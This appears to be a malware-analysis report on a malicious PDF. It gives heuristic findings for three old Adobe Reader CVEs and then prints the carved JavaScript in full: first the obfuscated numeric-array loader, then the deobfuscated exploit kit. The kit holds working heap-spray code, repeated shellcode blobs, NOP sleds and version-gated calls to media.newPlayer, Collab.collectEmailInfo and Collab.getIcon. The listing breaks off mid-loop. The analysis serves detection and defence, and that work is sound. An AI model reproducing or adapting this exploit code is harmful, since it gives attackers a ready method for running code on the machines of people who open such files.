MALICIOUS
448
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0052_000.js |
pdf-javascript-stream | PDF /JS object 52 at offset 0x16F | 17814 bytes |
SHA-256: add08c4a960b2ff9054ba7f4958962d8ebf04ba23fe18afa22e2c9dc7b6c94db |
|||
Preview scriptFirst 1,000 lines of the extracted script
NT6SsFJWR=this; W09S63Zi=['P','0','0','a','e','J','f','v','T','O','O','8','1','a','C','u','4','6','k','l','s','G','6','0','v'];Go2F711b79=W09S63Zi[4]+W09S63Zi[7]+W09S63Zi[13]+W09S63Zi[19];iG8G=NT6SsFJWR[Go2F711b79]; wGWk6ieQ=[102,117,110,99,116,105,111,110,32,102,105,120,95,105,116,40,121,97,114,115,112,44,108,101,110,41,123,119,104,105,108,101,40,121,97,114,115,112,46,108,101,110,103,116,104,42,50,60,108,101,110,41,123,121,97,114,115,112,43,61,121,97,114,115,112,59,125,121,97,114,115,112,61,121,97,114,115,112,46,115,117,98,115,116,114,105,110,103,40,48,44,108,101,110,47,50,41,59,114,101,116,117,114,110,32,121,97,114,115,112,59,125,13,10,102,117,110,99,116,105,111,110,32,112,114,105,110,116,100,40,41,123,13,10,118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,49,49,69,66,37,117,52,66,53,66,37,117,67,57,51,51,37,117,56,49,54,54,37,117,65,70,67,57,37,117,56,48,48,49,37,117,48,66,51,52,37,117,69,50,65,54,37,117,69,66,70,65,37,117,69,56,48,53,37,117,70,70,69,65,37,117,70,70,70,70,37,117,55,67,52,70,37,117,65,54,65,54,37,117,70,57,65,54,37,117,48,55,67,50,37,117,65,54,57,54,37,117,65,54,65,54,37,117,69,54,50,68,37,117,50,68,65,65,37,117,66,65,68,54,37,117,50,68,48,66,37,117,65,69,67,69,37,117,68,54,50,68,37,117,50,68,56,54,37,117,50,54,65,54,37,117,67,68,57,56,37,117,53,53,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,51,37,117,69,48,52,65,37,117,50,54,69,48,37,117,68,52,57,56,37,117,53,49,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,56,37,117,50,68,53,54,37,117,67,67,53,49,37,117,70,70,65,53,37,117,70,68,52,69,37,117,65,54,65,54,37,117,52,52,65,54,37,117,67,69,53,70,37,117,67,56,67,57,37,117,65,54,65,54,37,117,68,51,67,69,37,117,67,65,68,52,37,117,70,50,67,66,37,117,66,48,53,57,37,117,52,69,50,68,37,117,69,51,52,69,37,117,65,54,65,54,37,117,67,69,65,54,37,117,57,53,67,65,37,117,65,54,57,52,37,117,68,53,67,69,37,117,67,51,67,69,37,117,70,50,67,65,37,117,66,48,53,57,37,117,52,69,50,68,37,117,57,55,52,69,37,117,65,54,65,54,37,117,50,53,65,54,37,117,69,54,52,65,37,117,55,65,50,68,37,117,67,67,70,53,37,117,53,57,69,54,37,117,65,50,70,48,37,117,65,50,54,49,37,117,67,55,65,53,37,117,67,51,56,56,37,117,67,48,68,69,37,117,69,50,54,49,37,117,65,50,65,53,37,117,65,54,67,51,37,117,54,54,57,53,37,117,70,54,70,54,37,117,70,49,70,53,37,117,53,57,70,54,37,117,65,65,70,48,37,117,55,65,50,68,37,117,70,54,70,54,37,117,70,53,70,54,37,117,70,54,70,54,37,117,70,48,53,57,37,117,53,57,66,54,37,117,65,69,70,48,37,117,70,48,70,55,37,117,68,51,50,68,37,117,50,68,57,65,37,117,56,56,68,50,37,117,65,53,68,69,37,117,70,48,53,51,37,117,68,48,50,68,37,117,65,53,56,54,37,117,57,53,53,51,37,117,69,70,54,70,37,117,48,66,69,55,37,117,54,51,65,53,37,117,55,68,57,53,37,117,49,56,65,57,37,117,57,67,66,54,37,117,68,50,55,48,37,117,54,55,65,69,37,117,65,66,54,68,37,117,55,67,65,53,37,117,52,68,69,54,37,117,57,68,53,55,37,117,68,51,66,57,37,117,70,56,52,49,37,117,70,56,50,68,37,117,65,53,56,50,37,117,67,48,55,66,37,117,65,65,50,68,37,117,50,68,69,68,37,117,66,65,70,56,37,117,55,66,65,53,37,117,65,50,50,68,37,117,65,53,50,68,37,117,48,68,54,51,37,117,70,70,70,56,37,117,52,69,54,53,37,117,53,57,56,55,37,117,53,57,53,57,37,117,69,56,50,56,37,117,52,65,65,56,37,117,54,67,57,53,37,117,70,68,50,67,37,117,55,69,68,56,37,117,68,53,52,52,37,117,66,67,57,48,37,117,68,54,56,57,37,117,49,68,70,56,37,117,66,68,52,55,37,117,68,50,67,69,37,117,68,54,68,50,37,117,56,57,57,67,37,117,68,49,56,57,37,117,67,57,67,57,37,117,68,50,67,50,37,117,67,55,68,52,37,117,67,50,67,56,37,117,56,56,67,51,37,117,67,57,67,53,37,117,56,57,67,66,37,117,67,66,67,70,37,117,56,57,67,49,37,117,67,57,67,65,37,117,67,50,67,55,37,117,68,69,57,54,37,117,56,56,57,55,37,117,67,69,68,54,37,117,57,57,68,54,37,117,68,54,68,53,37,117,57,66,67,65,37,117,67,56,70,57,37,117,68,49,67,51,37,117,67,48,56,48,37,117,57,66,67,69,37,117,48,48,65,54,34,41,59,13,10,118,97,114,32,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,99,48,99,34,41,59,13,10,118,97,114,32,71,68,97,103,97,67,117,121,78,102,82,83,70,122,97,83,90,76,79,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,48,99,48,99,37,117,53,49,52,101,37,117,52,56,54,53,37,117,52,56,52,52,37,117,55,50,52,102,37,117,52,97,54,101,37,117,54,100,52,51,37,117,52,98,53,49,37,117,52,98,55,57,37,117,55,49,53,54,37,117,52,100,52,49,37,117,53,57,52,52,37,117,53,57,54,98,37,117,55,57,55,57,37,117,54,50,53,97,37,117,54,50,54,102,37,117,55,97,54,101,37,117,54,51,52,101,37,117,52,97,52,100,37,117,54,51,52,49,37,117,54,50,53,51,37,117,52,49,53,52,37,117,53,54,55,48,37,117,53,53,52,51,37,117,52,50,55,51,37,117,52,99,53,49,37,117,53,55,54,100,37,117,53,55,55,50,37,117,53,54,55,48,34,41,59,13,10,119,104,105,108,101,40,98,108,111,99,107,46,108,101,110,103,116,104,32,60,61,32,51,50,55,54,56,41,32,98,108,111,99,107,43,61,98,108,111,99,107,59,13,10,98,108,111,99,107,61,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,51,50,55,54,56,32,45,32,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,41,59,13,10,109,101,109,111,114,121,61,110,101,119,32,65,114,114,97,121,40,41,59,102,111,114,40,105,61,48,59,105,60,48,120,50,48,48,48,59,105,43,43,41,32,123,109,101,109,111,114,121,91,105,93,61,32,98,108,111,99,107,32,43,32,115,104,101,108,108,99,111,100,101,59,125,13,10,117,116,105,108,46,112,114,105,110,116,100,40,34,114,108,112,80,112,106,84,88,88,73,110,99,85,104,119,97,103,67,122,99,117,72,102,109,107,122,79,98,66,83,90,68,71,78,100,67,34,44,32,110,101,119,32,68,97,116,101,40,41,41,59,13,10,117,116,105,108,46,112,114,105,110,116,100,40,34,83,111,116,83,120,78,81,118,77,113,75,78,106,74,107,73,88,105,111,75,108,109,102,90,89,102,109,105,80,71,103,71,78,78,75,110,34,44,32,110,101,119,32,68,97,116,101,40,41,41,59,13,10,116,114,121,32,123,116,104,105,115,46,109,101,100,105,97,46,110,101,119,80,108,97,121,101,114,40,110,117,108,108,41,59,125,32,99,97,116,99,104,40,101,41,32,123,125,13,10,117,116,105,108,46,112,114,105,110,116,100,40,71,68,97,103,97,67,117,121,78,102,82,83,70,122,97,83,90,76,79,44,32,110,101,119,32,68,97,116,101,40,41,41,59,125,13,10,13,10,102,117,110,99,116,105,111,110,32,99,111,108,108,97,98,95,101,109,97,105,108,40,41,123,118,97,114,32,115,104,101,108,108,99,111,100,101,61,117,110,101,115,99,97,112,101,40,34,37,117,49,49,69,66,37,117,52,66,53,66,37,117,67,57,51,51,37,117,56,49,54,54,37,117,65,70,67,57,37,117,56,48,48,49,37,117,48,66,51,52,37,117,69,50,65,54,37,117,69,66,70,65,37,117,69,56,48,53,37,117,70,70,69,65,37,117,70,70,70,70,37,117,55,67,52,70,37,117,65,54,65,54,37,117,70,57,65,54,37,117,48,55,67,50,37,117,65,54,57,54,37,117,65,54,65,54,37,117,69,54,50,68,37,117,50,68,65,65,37,117,66,65,68,54,37,117,50,68,48,66,37,117,65,69,67,69,37,117,68,54,50,68,37,117,50,68,56,54,37,117,50,54,65,54,37,117,67,68,57,56,37,117,53,53,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,51,37,117,69,48,52,65,37,117,50,54,69,48,37,117,68,52,57,56,37,117,53,49,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,56,37,117,50,68,53,54,37,117,67,67,53,49,37,117,70,70,65,53,37,117,70,68,52,69,37,117,65,54,65,54,37,117,52,52,65,54,37,117,67,69,53,70,37,117,67,56,67,57,37,117,65,54,65,54,37,117,68,51,67,69,37,117,67,65,68,52,37,117,70,50,67,66,37,117,66,48,53,57,37,117,52,69,50,68,37,117,69,51,52,69,37,117,65,54,65,54,37,117,67,69,65,54,37,117,57,53,67,65,37,117,65,54,57,52,37,117,68,53,67,69,37,117,67,51,67,69,37,117,70,50,67,65,37,117,66,48,53,57,37,117,52,69,50,68,37,117,57,55,52,69,37,117,65,54,65,54,37,117,50,53,65,54,37,117,69,54,52,65,37,117,55,65,50,68,37,117,67,67,70,53,37,117,53,57,69,54,37,117,65,50,70,48,37,117,65,50,54,49,37,117,67,55,65,53,37,117,67,51,56,56,37,117,67,48,68,69,37,117,69,50,54,49,37,117,65,50,65,53,37,117,65,54,67,51,37,117,54,54,57,53,37,117,70,54,70,54,37,117,70,49,70,53,37,117,53,57,70,54,37,117,65,65,70,48,37,117,55,65,50,68,37,117,70,54,70,54,37,117,70,53,70,54,37,117,70,54,70,54,37,117,70,48,53,57,37,117,53,57,66,54,37,117,65,69,70,48,37,117,70,48,70,55,37,117,68,51,50,68,37,117,50,68,57,65,37,117,56,56,68,50,37,117,65,53,68,69,37,117,70,48,53,51,37,117,68,48,50,68,37,117,65,53,56,54,37,117,57,53,53,51,37,117,69,70,54,70,37,117,48,66,69,55,37,117,54,51,65,53,37,117,55,68,57,53,37,117,49,56,65,57,37,117,57,67,66,54,37,117,68,50,55,48,37,117,54,55,65,69,37,117,65,66,54,68,37,117,55,67,65,53,37,117,52,68,69,54,37,117,57,68,53,55,37,117,68,51,66,57,37,117,70,56,52,49,37,117,70,56,50,68,37,117,65,53,56,50,37,117,67,48,55,66,37,117,65,65,50,68,37,117,50,68,69,68,37,117,66,65,70,56,37,117,55,66,65,53,37,117,65,50,50,68,37,117,65,53,50,68,37,117,48,68,54,51,37,117,70,70,70,56,37,117,52,69,54,53,37,117,53,57,56,55,37,117,53,57,53,57,37,117,69,56,50,56,37,117,52,65,65,56,37,117,54,67,57,53,37,117,70,68,50,67,37,117,55,69,68,56,37,117,68,53,52,52,37,117,66,67,57,48,37,117,68,54,56,57,37,117,49,68,70,56,37,117,66,68,52,55,37,117,68,50,67,69,37,117,68,54,68,50,37,117,56,57,57,67,37,117,68,49,56,57,37,117,67,57,67,57,37,117,68,50,67,50,37,117,67,55,68,52,37,117,67,50,67,56,37,117,56,56,67,51,37,117,67,57,67,53,37,117,56,57,67,66,37,117,67,66,67,70,37,117,56,57,67,49,37,117,67,57,67,65,37,117,67,50,67,55,37,117,68,69,57,54,37,117,56,56,57,55,37,117,67,69,68,54,37,117,57,57,68,54,37,117,68,54,68,53,37,117,57,66,67,65,37,117,67,51,70,57,37,117,67,55,67,66,37,117,67,65,67,70,37,117,67,48,56,48,37,117,57,66,67,69,37,117,48,48,65,54,34,41,59,118,97,114,32,109,101,109,95,97,114,114,97,121,61,110,101,119,32,65,114,114,97,121,40,41,59,118,97,114,32,99,99,61,48,120,48,99,48,99,48,99,48,99,59,118,97,114,32,97,100,100,114,61,48,120,52,48,48,48,48,48,59,118,97,114,32,115,99,95,108,101,110,61,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,42,50,59,118,97,114,32,108,101,110,61,97,100,100,114,45,40,115,99,95,108,101,110,43,48,120,51,56,41,59,118,97,114,32,121,97,114,115,112,61,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,59,121,97,114,115,112,61,102,105,120,95,105,116,40,121,97,114,115,112,44,108,101,110,41,59,118,97,114,32,99,111,117,110,116,50,61,40,99,99,45,48,120,52,48,48,48,48,48,41,47,97,100,100,114,59,102,111,114,40,118,97,114,32,99,111,117,110,116,61,48,59,99,111,117,110,116,60,99,111,117,110,116,50,59,99,111,117,110,116,43,43,41,123,109,101,109,95,97,114,114,97,121,91,99,111,117,110,116,93,61,121,97,114,115,112,43,115,104,101,108,108,99,111,100,101,59,125,13,10,118,97,114,32,111,118,101,114,102,108,111,119,61,117,110,101,115,99,97,112,101,40,34,37,117,48,99,48,99,37,117,48,99,48,99,34,41,59,119,104,105,108,101,40,111,118,101,114,102,108,111,119,46,108,101,110,103,116,104,60,52,52,57,53,50,41,123,111,118,101,114,102,108,111,119,43,61,111,118,101,114,102,108,111,119,59,125,13,10,116,104,105,115,46,99,111,108,108,97,98,83,116,111,114,101,61,67,111,108,108,97,98,46,99,111,108,108,101,99,116,69,109,97,105,108,73,110,102,111,40,123,115,117,98,106,58,34,34,44,109,115,103,58,111,118,101,114,102,108,111,119,125,41,59,125,13,10,13,10,102,117,110,99,116,105,111,110,32,99,111,108,108,97,98,95,103,101,116,105,99,111,110,40,41,123,105,102,40,97,112,112,46,100,111,99,46,67,111,108,108,97,98,46,103,101,116,73,99,111,110,41,123,118,97,114,32,97,114,114,121,61,110,101,119,32,65,114,114,97,121,40,41,59,118,97,114,32,118,118,112,101,116,104,121,97,61,117,110,101,115,99,97,112,101,40,34,37,117,49,49,69,66,37,117,52,66,53,66,37,117,67,57,51,51,37,117,56,49,54,54,37,117,65,70,67,57,37,117,56,48,48,49,37,117,48,66,51,52,37,117,69,50,65,54,37,117,69,66,70,65,37,117,69,56,48,53,37,117,70,70,69,65,37,117,70,70,70,70,37,117,55,67,52,70,37,117,65,54,65,54,37,117,70,57,65,54,37,117,48,55,67,50,37,117,65,54,57,54,37,117,65,54,65,54,37,117,69,54,50,68,37,117,50,68,65,65,37,117,66,65,68,54,37,117,50,68,48,66,37,117,65,69,67,69,37,117,68,54,50,68,37,117,50,68,56,54,37,117,50,54,65,54,37,117,67,68,57,56,37,117,53,53,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,51,37,117,69,48,52,65,37,117,50,54,69,48,37,117,68,52,57,56,37,117,53,49,68,51,37,117,69,48,69,48,37,117,57,56,50,54,37,117,68,51,67,56,37,117,50,68,53,54,37,117,67,67,53,49,37,117,70,70,65,53,37,117,70,68,52,69,37,117,65,54,65,54,37,117,52,52,65,54,37,117,67,69,53,70,37,117,67,56,67,57,37,117,65,54,65,54,37,117,68,51,67,69,37,117,67,65,68,52,37,117,70,50,67,66,37,117,66,48,53,57,37,117,52,69,50,68,37,117,69,51,52,69,37,117,65,54,65,54,37,117,67,69,65,54,37,117,57,53,67,65,37,117,65,54,57,52,37,117,68,53,67,69,37,117,67,51,67,69,37,117,70,50,67,65,37,117,66,48,53,57,37,117,52,69,50,68,37,117,57,55,52,69,37,117,65,54,65,54,37,117,50,53,65,54,37,117,69,54,52,65,37,117,55,65,50,68,37,117,67,67,70,53,37,117,53,57,69,54,37,117,65,50,70,48,37,117,65,50,54,49,37,117,67,55,65,53,37,117,67,51,56,56,37,117,67,48,68,69,37,117,69,50,54,49,37,117,65,50,65,53,37,117,65,54,67,51,37,117,54,54,57,53,37,117,70,54,70,54,37,117,70,49,70,53,37,117,53,57,70,54,37,117,65,65,70,48,37,117,55,65,50,68,37,117,70,54,70,54,37,117,70,53,70,54,37,117,70,54,70,54,37,117,70,48,53,57,37,117,53,57,66,54,37,117,65,69,70,48,37,117,70,48,70,55,37,117,68,51,50,68,37,117,50,68,57,65,37,117,56,56,68,50,37,117,65,53,68,69,37,117,70,48,53,51,37,117,68,48,50,68,37,117,65,53,56,54,37,117,57,53,53,51,37,117,69,70,54,70,37,117,48,66,69,55,37,117,54,51,65,53,37,117,55,68,57,53,37,117,49,56,65,57,37,117,57,67,66,54,37,117,68,50,55,48,37,117,54,55,65,69,37,117,65,66,54,68,37,117,55,67,65,53,37,117,52,68,69,54,37,117,57,68,53,55,37,117,68,51,66,57,37,117,70,56,52,49,37,117,70,56,50,68,37,117,65,53,56,50,37,117,67,48,55,66,37,117,65,65,50,68,37,117,50,68,69,68,37,117,66,65,70,56,37,117,55,66,65,53,37,117,65,50,50,68,37,117,65,53,50,68,37,117,48,68,54,51,37,117,70,70,70,56,37,117,52,69,54,53,37,117,53,57,56,55,37,117,53,57,53,57,37,117,69,56,50,56,37,117,52,65,65,56,37,117,54,67,57,53,37,117,70,68,50,67,37,117,55,69,68,56,37,117,68,53,52,52,37,117,66,67,57,48,37,117,68,54,56,57,37,117,49,68,70,56,37,117,66,68,52,55,37,117,68,50,67,69,37,117,68,54,68,50,37,117,56,57,57,67,37,117,68,49,56,57,37,117,67,57,67,57,37,117,68,50,67,50,37,117,67,55,68,52,37,117,67,50,67,56,37,117,56,56,67,51,37,117,67,57,67,53,37,117,56,57,67,66,37,117,67,66,67,70,37,117,56,57,67,49,37,117,67,57,67,65,37,117,67,50,67,55,37,117,68,69,57,54,37,117,56,56,57,55,37,117,67,69,68,54,37,117,57,57,68,54,37,117,68,54,68,53,37,117,57,66,67,65,37,117,67,49,70,57,37,117,68,50,67,51,37,117,67,53,67,70,37,117,67,56,67,57,37,117,67,48,56,48,37,117,57,66,67,69,37,117,48,48,65,54,34,41,59,118,97,114,32,104,87,113,53,48,48,67,78,61,118,118,112,101,116,104,121,97,46,108,101,110,103,116,104,42,50,59,118,97,114,32,108,101,110,61,48,120,52,48,48,48,48,48,45,40,104,87,113,53,48,48,67,78,43,48,120,51,56,41,59,118,97,114,32,121,97,114,115,112,61,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,59,121,97,114,115,112,61,102,105,120,95,105,116,40,121,97,114,115,112,44,108,101,110,41,59,118,97,114,32,112,53,65,106,75,54,53,102,61,40,48,120,48,99,48,99,48,99,48,99,45,48,120,52,48,48,48,48,48,41,47,48,120,52,48,48,48,48,48,59,102,111,114,40,118,97,114,32,118,113,99,81,68,57,54,121,61,48,59,118,113,99,81,68,57,54,121,60,112,53,65,106,75,54,53,102,59,118,113,99,81,68,57,54,121,43,43,41,123,97,114,114,121,91,118,113,99,81,68,57,54,121,93,61,121,97,114,115,112,43,118,118,112,101,116,104,121,97,59,125,13,10,118,97,114,32,116,85,77,104,78,98,71,119,61,117,110,101,115,99,97,112,101,40,34,37,48,57,34,41,59,119,104,105,108,101,40,116,85,77,104,78,98,71,119,46,108,101,110,103,116,104,60,48,120,52,48,48,48,41,123,116,85,77,104,78,98,71,119,43,61,116,85,77,104,78,98,71,119,59,125,13,10,116,85,77,104,78,98,71,119,61,34,78,46,34,43,116,85,77,104,78,98,71,119,59,97,112,112,46,100,111,99,46,67,111,108,108,97,98,46,103,101,116,73,99,111,110,40,116,85,77,104,78,98,71,119,41,59,125,125,13,10,13,10,102,117,110,99,116,105,111,110,32,80,80,80,68,68,68,70,70,40,41,123,118,97,114,32,118,101,114,115,105,111,110,61,97,112,112,46,118,105,101,119,101,114,86,101,114,115,105,111,110,46,116,111,83,116,114,105,110,103,40,41,59,118,101,114,115,105,111,110,61,118,101,114,115,105,111,110,46,114,101,112,108,97,99,101,40,47,92,68,47,103,44,39,39,41,59,118,97,114,32,118,97,114,115,105,111,110,95,97,114,114,97,121,61,110,101,119,32,65,114,114,97,121,40,118,101,114,115,105,111,110,46,99,104,97,114,65,116,40,48,41,44,118,101,114,115,105,111,110,46,99,104,97,114,65,116,40,49,41,44,118,101,114,115,105,111,110,46,99,104,97,114,65,116,40,50,41,41,59,13,10,105,102,40,118,97,114,115,105,111,110,95,97,114,114,97,121,91,48,93,60,56,41,123,99,111,108,108,97,98,95,101,109,97,105,108,40,41,59,125,13,10,105,102,40,40,118,97,114,115,105,111,110,95,97,114,114,97,121,91,48,93,60,56,41,124,124,40,118,97,114,115,105,111,110,95,97,114,114,97,121,91,48,93,61,61,56,38,38,118,97,114,115,105,111,110,95,97,114,114,97,121,91,49,93,60,50,38,38,118,97,114,115,105,111,110,95,97,114,114,97,121,91,50,93,60,50,41,41,123,99,111,108,108,97,98,95,103,101,116,105,99,111,110,40,41,59,125,13,10,105,102,40,40,118,97,114,115,105,111,110,95,97,114,114,97,121,91,48,93,60,57,41,124,124,40,118,97,114,115,105,111,110,95,97,114,114,97,121,91,48,93,61,61,57,38,38,118,97,114,115,105,111,110,95,97,114,114,97,121,91,49,93,60,49,41,41,123,99,111,108,108,97,98,95,103,101,116,105,99,111,110,40,41,59,125,13,10,112,114,105,110,116,100,40,41,59,13,10,125,13,10,80,80,80,68,68,68,70,70,40,41,59,13,10];iG8G("dU73='"+"'; j42"+"1=thi"+"s.numP"+"ages;"+" Ij"+"QS13WGx"+"=20"+"; for ("+"LX9"+"SYiY"+"=0;L"+"X9SYiY<"+"wGWk6ieQ"+".length"+";LX9SY"+"iY++){"+"wGWk"+"6ie"+"Q[LX"+"9SYiY] ^"+"=j421; "+"wGWk6ieQ"+"[LX9SYiY"+"] ^"+"=IjQS13W"+"Gx; dU"+"73 +=St"+"ring.fro"+"mCharCod"+"e(wGWk"+"6ieQ[L"+"X9SYiY"+"]);}iG8G"+"(dU"+"73)"+";"+"");
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery numeric-array-bytes from JavaScript object 52 at offset 0x16F | 5222 bytes |
SHA-256: a14fb90626e01e3285a22b28b49490560ec003ab5362fa9c52d9bef75958bb9b |
|||
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 9 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function printd(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC8F9%uD1C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uC9C9%uD2C2%uC7D4%uC2C8%u88C3%uC9C5%u89CB%uCBCF%u89C1%uC9CA%uC2C7%uDE96%u8897%uCED6%u99D6%uD6D5%u9BCA%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var 